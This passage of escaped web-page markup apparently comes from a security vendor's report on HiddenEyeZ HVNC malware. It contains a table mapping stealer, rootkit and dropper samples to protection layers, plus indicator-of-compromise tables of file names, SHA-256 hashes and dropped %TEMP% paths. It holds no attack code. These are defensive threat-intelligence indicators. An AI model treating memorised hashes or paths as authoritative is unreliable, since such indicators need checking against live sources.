class=\"td_class_16603208\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_16603208\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Dropper de 
HiddenEyeZ HVNC<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_94527499\" rowspan=\"1\" colspan=\"1\" class=\"td_class_94527499\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_94527499\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Baseline protection<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_29333972\" rowspan=\"1\" colspan=\"1\" class=\"td_class_29333972\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_29333972\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Blocking the execution<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i 
class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_3698383\" class=\"desktop-view tr_class_3698383 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_51053142\" rowspan=\"1\" colspan=\"1\" class=\"td_class_51053142\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_51053142\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">StormKitty \/ Prynt Stealer<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_28159375\" rowspan=\"1\" colspan=\"1\" class=\"td_class_28159375\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_28159375\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Data Leak Prevention<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_79705227\" 
rowspan=\"1\" colspan=\"1\" class=\"td_class_79705227\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_79705227\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Blocking the recovery of protected sensitive data<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_6608838\" class=\"desktop-view tr_class_6608838 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_56412718\" rowspan=\"1\" colspan=\"1\" class=\"td_class_56412718\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_56412718\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">HiddenEyeZ HVNC<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_21700656\" rowspan=\"1\" colspan=\"1\" class=\"td_class_21700656\" style=\"padding: 10px; max-width: 200px; min-width: 200px; 
border: 1px solid rgb(0, 0, 0);\"> <\/td><td>No blocking without explicit action by the attacker<\/td><\/tr>
<tr><td>Install r77<\/td><td>Baseline protection<\/td><td>Blocking the execution<\/td><\/tr>
<tr><td>Uninstall r77<\/td><td>Baseline protection<\/td><td>Blocking the execution<\/td><\/tr>
<tr><td>Icarus<\/td><td>Data Leak Prevention<\/td><td>Blocking the recovery of protected sensitive data<\/td><\/tr>
<tr><td>Highlander<\/td><td>Baseline protection<\/td><td>Blocking the execution<\/td><\/tr>
<\/tbody><\/table><\/div>\n[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h2>HiddenEyeZ malware &amp; IoCs<\/h2>\n<h3>Files<\/h3>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<div class=\"ntb_table_wrapper ninja_table_builder_instance_13\"\n     id='ninja_table_builder_414259'\n     data-ninja_table_builder_instance=\"ninja_table_builder_instance_13\"\n     style=\"\n     max-height:1200px;\n     max-width: 800px;margin-right: auto;\">\n    <!----> <table id=\"ntb_table\" role=\"table\" class=\"table ninja_tables_builder_class_414259\" style=\"margin-top: 0px; margin-bottom: 0px; table-layout: fixed; border-collapse: collapse; border: 0px solid rgb(0, 0, 0); font-family: inherit; border-spacing: 0px; margin-right: auto;\"><!----> <tbody class=\"tbody\">
<tr><td><strong>File names<\/strong><\/td><td><strong>SHA-256<\/strong><\/td><td><strong>Sample<\/strong><\/td><\/tr>
<tr><td>svchost.exe<\/td><td>fede8f2bc1985107197319816287218a3631460e2f8205cf119ce406d7c3b2d7<\/td><td>StormKitty \/ Prynt Stealer<\/td><\/tr>
<tr><td>AddTaskStartUp.exe<\/td><td>469e25f46030d6fb3b04e83b095b5c8e09017e39c40bc584920e324fd87d0700<\/td><td>AddStartupTask<\/td><\/tr>
<tr><td>svchost.exe<\/td><td>6b4ea42c1de9777847d7b6f980976310abe46d2de9792045a6eba54b032b8520<\/td><td>Icarus<\/td><\/tr>
<tr><td> <\/td><td>a8361bd86b7859c0d93c8470975e9ffd20765c42ecb49491c029542213410a85<\/td><td>Highlander<\/td><\/tr>
<tr><td>Installs.exe<\/td><td>bb86e41bb6d5eccad1ff84ab343506f4f5fcd78b0618966edc0ae0e05fcc8683<\/td><td>HiddenEyeZ HVNC Dropper<\/td><\/tr>
<tr><td>rk.exe<\/td><td>4604e501fb4efb5ce862e81232c61b29e4470b5313055efb291593d66f23af7e<\/td><td>r77 (Install)<\/td><\/tr>
<tr><td>rkd.exe<\/td><td>6c1b2c9ae4887ff134bd098cab3e6c5ada1482f45a129ccc858733a545a10619<\/td><td>r77 (Uninstall)<\/td><\/tr>
<tr><td>r77-x64.dll<\/td><td>2141974f665f4d8fecb6d8ea06add624b57f320f901368847175570ee716fd8e<\/td><td>r77 (64-bit DLL)<\/td><\/tr>
<tr><td>r77-x86.dll<\/td><td>ed3ee849ae71001941d03983a65eacdd726be75d91b076475a89a3a75e79d82e<\/td><td>r77 (32-bit DLL)<\/td><\/tr>
<tr id=\"tr_id_5029327\" class=\"desktop-view tr_class_5029327 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_99941391\" rowspan=\"1\" colspan=\"1\" class=\"td_class_99941391\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_99941391\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 
15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\"> <\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_53506720\" rowspan=\"1\" colspan=\"1\" class=\"td_class_53506720\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_53506720\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">ba1615c7617f148228c587ffe7607ac841fd682ba4905f4af53e18d601b84102<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_75939967\" rowspan=\"1\" colspan=\"1\" class=\"td_class_75939967\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_75939967\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">HiddenEyeZ HVNC<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style 
remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_9106279\" class=\"desktop-view tr_class_9106279 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_58473188\" rowspan=\"1\" colspan=\"1\" class=\"td_class_58473188\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_58473188\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">rescale.ps1<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_57347672\" rowspan=\"1\" colspan=\"1\" class=\"td_class_57347672\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_57347672\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">a10479eea5f9d85ac00db77c0e090de2db64cdb163055e7b42fbcb2c97a66898<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i 
class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_62756446\" rowspan=\"1\" colspan=\"1\" class=\"td_class_62756446\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_62756446\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">HiddenEyeZ HVNC<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<div class=\"ntb_table_wrapper ninja_table_builder_instance_14\"\n     id='ninja_table_builder_414264'\n     data-ninja_table_builder_instance=\"ninja_table_builder_instance_14\"\n     style=\"\n     max-height:900px;\n     max-width: 800px;margin-right: auto;\">\n    <!----> <table id=\"ntb_table\" role=\"table\" class=\"table ninja_tables_builder_class_414264\" style=\"margin-top: 0px; margin-bottom: 0px; table-layout: fixed; border-collapse: collapse; border: 0px solid rgb(0, 0, 0); font-family: inherit; border-spacing: 0px; margin-right: auto;\"><!----> <tbody class=\"tbody\"><tr id=\"tr_id_6882207\" class=\"desktop-view tr_class_6882207 \" style=\"background: rgb(221, 221, 
221);\"><!----> <td id=\"td_id_69390267\" rowspan=\"1\" colspan=\"1\" class=\"td_class_69390267\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_69390267\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: bold; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Path<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_48781154\" rowspan=\"1\" colspan=\"1\" class=\"td_class_48781154\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_48781154\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: bold; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Sample<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_9916506\" class=\"desktop-view tr_class_9916506 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_38476109\" rowspan=\"1\" colspan=\"1\" class=\"td_class_38476109\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px 
solid rgb(0, 0, 0);\"><div id=\"td_id_38476109\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">%TEMP%proclog.exe<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_27588435\" rowspan=\"1\" colspan=\"1\" class=\"td_class_27588435\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_27588435\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">HiddenEyeZ HVNC<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_1131809\" class=\"desktop-view tr_class_1131809 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_57384229\" rowspan=\"1\" colspan=\"1\" class=\"td_class_57384229\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_57384229\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 
0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">%TEMP%drive.bat<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_34924618\" rowspan=\"1\" colspan=\"1\" class=\"td_class_34924618\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_34924618\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">HiddenEyeZ HVNC<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_5523417\" class=\"desktop-view tr_class_5523417 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_48746926\" rowspan=\"1\" colspan=\"1\" class=\"td_class_48746926\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_48746926\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: 
block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">%TEMP%HiddenEyeZ.zip<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_90677731\" rowspan=\"1\" colspan=\"1\" class=\"td_class_90677731\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_90677731\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Icarus<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_2437905\" class=\"desktop-view tr_class_2437905 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_97234173\" rowspan=\"1\" colspan=\"1\" class=\"td_class_97234173\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_97234173\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">%TEMP%svchost.exe<\/span> <!----> <!----><\/div> <div 
class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_53024053\" rowspan=\"1\" colspan=\"1\" class=\"td_class_53024053\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_53024053\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">HiddenEyeZ HVNC Dropper \/ HiddenEyeZ HVNC<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_2639852\" class=\"desktop-view tr_class_2639852 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_68426643\" rowspan=\"1\" colspan=\"1\" class=\"td_class_68426643\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_68426643\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">%TEMP%svchost.bat<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" 
style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_71976866\" rowspan=\"1\" colspan=\"1\" class=\"td_class_71976866\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_71976866\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">HiddenEyeZ HVNC Dropper \/ HiddenEyeZ HVNC<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_2977869\" class=\"desktop-view tr_class_2977869 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_29205679\" rowspan=\"1\" colspan=\"1\" class=\"td_class_29205679\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_29205679\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">rescale.ps1<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i 
class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_81574334\" rowspan=\"1\" colspan=\"1\" class=\"td_class_81574334\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_81574334\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">HiddenEyeZ HVNC Dropper \/ HiddenEyeZ HVNC<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_5156094\" class=\"desktop-view tr_class_5156094 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_35772915\" rowspan=\"1\" colspan=\"1\" class=\"td_class_35772915\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_35772915\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 